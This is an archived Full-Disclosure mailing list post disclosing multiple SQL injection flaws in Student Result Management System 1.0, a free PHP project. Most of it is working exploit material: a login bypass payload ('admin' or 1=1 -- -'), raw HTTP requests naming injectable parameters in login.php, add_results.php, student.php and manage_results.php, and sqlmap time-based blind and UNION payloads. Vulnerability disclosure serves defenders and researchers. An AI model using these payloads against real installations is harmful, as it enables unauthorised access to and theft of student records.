lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 4 Oct 2020 23:33:17 +0630
From: b1nary <thebinary0x1@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Student Result Management System 1.0 - Multiple SQL Injection
	Vulnerabilities

# Exploit Title: Student Result Management System 1.0 - Multiple SQL
Injection Vulnerabilities
# Date: 2020-10-02
# Exploit Author: b1nary
# Vendor Homepage:
https://projectworlds.in/free-projects/php-projects/student-result-management-system-project-in-php/
# Software Link: https://github.com/projectworlds32/srms/archive/master.zip
# Version: 1.0
# Tested On: Linux + Apache2
# Description: Project Worlds Student Result Management System 1.0 is
subject to multiple SQL injection vulnerabilities due to improper input
sanitization.


=====================================================================================================

Authentication bypass:

POST /srms-master/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/srms-master/login.php
Cookie: PHPSESSID=t2hp6dv7shpbr42q99l7rag5t9
Upgrade-Insecure-Requests: 1

userid=admin' or 1=1 -- -&password=password

=====================================================================================================

POST parameters: rno, class_name

POST /srms-master/add_results.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/srms-master/add_results.php
Cookie: PHPSESSID=t2hp6dv7shpbr42q99l7rag5t9
Upgrade-Insecure-Requests: 1

class_name=a*&rno=1*&p1=2&p2=3&p3=4&p4=5&p5=5


Sqlmap PoC:

Parameter: #2* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: class_name=a&rno=1' AND (SELECT 8435 FROM
(SELECT(SLEEP(5)))bqQO) AND 'ubgm'='ubgm&p1=2&p2=3&p3=4&p4=5&p5=5

Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: class_name=a' AND (SELECT 9372 FROM (SELECT(SLEEP(5)))QJFS)
AND 'ciTV'='ciTV&rno=1&p1=2&p2=3&p3=4&p4=5&p5=5

=====================================================================================================

GET parameter: class

GET /srms-master/student.php?class=a*&rn=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Connection: close
Referer: http://localhost/srms-master/login.php
Cookie: PHPSESSID=t2hp6dv7shpbr42q99l7rag5t9
Upgrade-Insecure-Requests: 1


Sqlmap PoC:

Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://localhost:80/srms-master/student.php?class=a' AND
(SELECT 8178 FROM (SELECT(SLEEP(5)))eKNu) AND 'tPzY'='tPzY&rn=1

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: http://localhost:80/srms-master/student.php?class=a' UNION ALL
SELECT
NULL,CONCAT(0x71626b6b71,0x4c6d574642516a4d79436571774851464863774d676178767578515071537544534e784750445562,0x716b767871),NULL,NULL,NULL,NULL,NULL--
-&rn=1

=====================================================================================================

POST parameters: class_name, rno

POST /srms-master/manage_results.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/srms-master/manage_results.php
Cookie: PHPSESSID=t2hp6dv7shpbr42q99l7rag5t9
Upgrade-Insecure-Requests: 1

class_name=a*&rno=1*


Sqlmap PoC:

Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: class_name=a' AND (SELECT 6255 FROM (SELECT(SLEEP(5)))oVzX)
AND 'paEb'='paEb&rno=1

Parameter: #2* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: class_name=a&rno=1' AND (SELECT 5940 FROM
(SELECT(SLEEP(5)))orHi) AND 'wdBr'='wdBr

=====================================================================================================

POST parameters: class, rn

POST /srms-master/manage_results.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/srms-master/manage_results.php
Cookie: PHPSESSID=t2hp6dv7shpbr42q99l7rag5t9
Upgrade-Insecure-Requests: 1

class=a*&rn=1*&p1=1&p2=2&p3=3&p4=4&p5=5


Sqlmap PoC:

Parameter: #2* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: class=a&rn=1' AND (SELECT 8305 FROM (SELECT(SLEEP(5)))Cldu)
AND 'oMCW'='oMCW&p1=1&p2=2&p3=3&p4=4&p5=5

Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: class=a' AND (SELECT 3606 FROM (SELECT(SLEEP(5)))HOqE) AND
'MgjX'='MgjX&rn=1&p1=1&p2=2&p3=3&p4=4&p5=5

=====================================================================================================

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists